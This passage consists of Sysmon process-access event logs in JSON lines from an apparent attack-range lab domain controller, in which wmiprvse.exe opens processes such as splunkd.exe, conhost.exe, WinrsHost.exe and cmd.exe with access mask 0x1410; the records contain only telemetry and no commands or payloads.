05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nTargetProcessId: 2768\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","TargetProcessId":"2768","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0240-5F25-0000-00107DA50500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010FC520A00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nTargetProcessId: 660\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","TargetProcessId":"660","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: 